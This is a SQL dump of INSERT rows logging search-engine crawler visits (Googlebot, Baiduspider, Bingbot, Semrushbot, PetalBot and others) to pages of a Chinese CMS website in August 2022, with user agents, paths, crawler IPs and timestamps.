INSERT INTO `ey_weapp_spider_visit` VALUES ('95771', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/303.html', '40.77.167.13', '1661000360', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95770', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.229', '1661000050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95791', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '59.58.228.63', '1661010622', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95816', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bss.html', '114.119.151.155', '1661031000', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95754', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_61/', '66.249.79.112', '1660984534', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95743', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/317.html', '114.119.151.155', '1660979584', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95740', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1660978500', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97942', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/188.html', '220.181.108.104', '1661957218', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97940', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.112', '1661956946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95737', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660976984', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95725', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/213.html', '220.181.108.92', '1660971574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95723', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/gongsijianjie/', '116.179.32.135', '1660970305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95724', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/210.html', '185.191.171.20', '1660971185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95722', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_36/', '185.191.171.12', '1660969441', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95716', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/404.html', '114.119.151.155', '1660965910', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97802', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.110', '1661894983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95708', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/165.html', '42.236.10.98', '1660962890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95704', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/207.html', '116.179.32.159', '1660961421', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97663', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661836966', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95703', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660961310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95715', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.110', '1660965737', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95693', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/76.html', '220.181.108.144', '1660958886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98008', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661998617', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95721', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_8/', '185.191.171.6', '1660967452', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97914', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/353.html', '116.179.32.137', '1661942819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97931', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/99.0.4844.84 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661949117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98000', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.108', '1661995855', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95686', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_3.html', '185.191.171.5', '1660954907', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95685', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jbzxw/', '185.191.171.17', '1660954824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95683', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660954426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95684', '4', 'mozilla/5.0 (iphone; cpu iphone os 11_0 like mac os x) applewebkit/604.1.34 (khtml, like gecko) version/11.0 mobile/15a5341f safari/604.1;360spider', '/', '42.236.10.83', '1660954593', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95679', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/48.html', '185.191.171.10', '1660952400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95682', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/hangyexinwen/', '220.181.108.167', '1660953808', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98013', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/17.html', '185.191.171.24', '1662000214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95752', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_8.html', '185.191.171.3', '1660984247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95667', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_6/', '185.191.171.5', '1660948452', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95668', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/477.html', '185.191.171.21', '1660948653', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95665', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660947661', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95729', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1660973946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95666', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.80', '1660947806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95664', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/351.html', '116.179.32.22', '1660947462', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98016', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.112', '1662003479', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95669', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/60.html', '116.179.32.84', '1660948731', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95670', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/374.html', '116.179.32.34', '1660950002', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95730', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tls.html', '114.119.151.153', '1660974017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95676', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/about/', '157.55.39.117', '1660951773', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95660', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/177.html', '220.181.108.159', '1660946193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95731', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/16_3.html', '185.191.171.13', '1660975271', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95662', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/434.html', '185.191.171.2', '1660946729', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95661', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/434.html', '185.191.171.2', '1660946706', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95671', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660950058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95733', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_2.html', '185.191.171.38', '1660976114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95734', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/480.html', '66.249.79.108', '1660976592', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95652', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.112', '1660942651', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95735', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_61/', '66.249.79.112', '1660976594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95654', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/blj/', '114.119.151.153', '1660943862', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95653', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/315.html', '116.179.32.14', '1660943657', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95657', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/258.html', '116.179.32.96', '1660944924', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95639', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/13.html?tagid=13', '185.191.171.2', '1660938496', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95741', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljwd/list_20_2/', '220.181.108.177', '1660979305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95736', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/315.html', '185.191.171.3', '1660976925', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95738', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/chs.html', '114.119.151.155', '1660977065', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95739', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_4.html', '116.179.32.220', '1660978036', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95643', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1660939713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95645', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baiyin.html', '114.119.151.153', '1660940195', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95691', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/152.html', '220.181.108.81', '1660957615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95760', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/101_7.html', '185.191.171.20', '1660988143', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95634', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/114.html', '220.181.108.104', '1660935039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95633', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/485.html', '185.191.171.41', '1660934636', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95632', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/16.html', '114.119.151.155', '1660933723', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95635', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/445.html', '216.244.66.194', '1660936345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95747', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/151.html', '66.249.79.112', '1660981886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95742', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_16.html', '220.181.108.165', '1660979306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95744', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1660979971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95638', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jiaruwomen/', '114.119.151.153', '1660937869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95637', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.108', '1660937066', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95636', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_61/', '216.244.66.194', '1660936951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95631', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_20.html', '185.191.171.9', '1660933395', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95748', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660982528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95630', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/111_2.html', '185.191.171.24', '1660933375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95628', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/162.html', '114.119.151.155', '1660932751', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95764', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/286.html', '40.77.167.13', '1660994450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95792', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_6/', '185.191.171.8', '1661011152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95793', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1661012770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95623', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_35/', '220.181.108.169', '1660930495', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95624', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_39/', '114.119.151.155', '1660931631', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95755', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_7.html', '185.191.171.13', '1660985452', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95756', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/280.html', '66.249.79.112', '1660985569', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95625', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_63/', '185.191.171.37', '1660932287', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95751', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_5.html', '185.191.171.23', '1660984169', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95753', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/164.html', '116.179.32.41', '1660984381', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95629', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/165.html', '116.179.32.153', '1660932767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95626', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/258.html', '114.119.151.155', '1660932438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95627', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_15', '114.119.151.155', '1660932593', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95749', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/144.html', '220.181.108.169', '1660983113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95750', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.112', '1660983397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95619', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/141.html', '216.244.66.194', '1660929544', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95617', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.112', '1660929145', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95758', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_9.html', '116.179.32.227', '1660986921', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95615', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/103.html', '114.119.151.155', '1660927232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95616', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/75.html', '220.181.108.146', '1660928221', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95618', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/16.html', '66.249.79.108', '1660929171', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95554', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/72.html', '116.179.32.171', '1660890130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95552', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1660889102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95777', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/53.html', '185.191.171.12', '1661001745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95553', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/403.html', '66.249.79.110', '1660889993', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95556', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660894039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96364', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/92.html', '220.181.108.166', '1661273973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96361', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_3.html', '185.191.171.10', '1661273562', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96362', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/146.html', '216.244.66.194', '1661273626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96363', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/225.html', '216.244.66.194', '1661273635', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95559', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/496.html', '66.249.79.110', '1660894149', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95769', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_11/', '114.119.151.153', '1661000047', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95774', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/446.html', '114.119.151.155', '1661001062', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95561', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/161.html', '116.179.32.238', '1660896676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95562', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_18.html', '116.179.32.32', '1660898311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95766', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_51/', '220.181.108.178', '1660995141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95564', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/87.html', '216.244.66.194', '1660900376', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95565', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_16/', '114.119.151.155', '1660901361', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95570', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/tbxw/list_91_2/', '114.119.151.155', '1660902155', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95567', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/100.html', '66.249.79.108', '1660901602', '0');
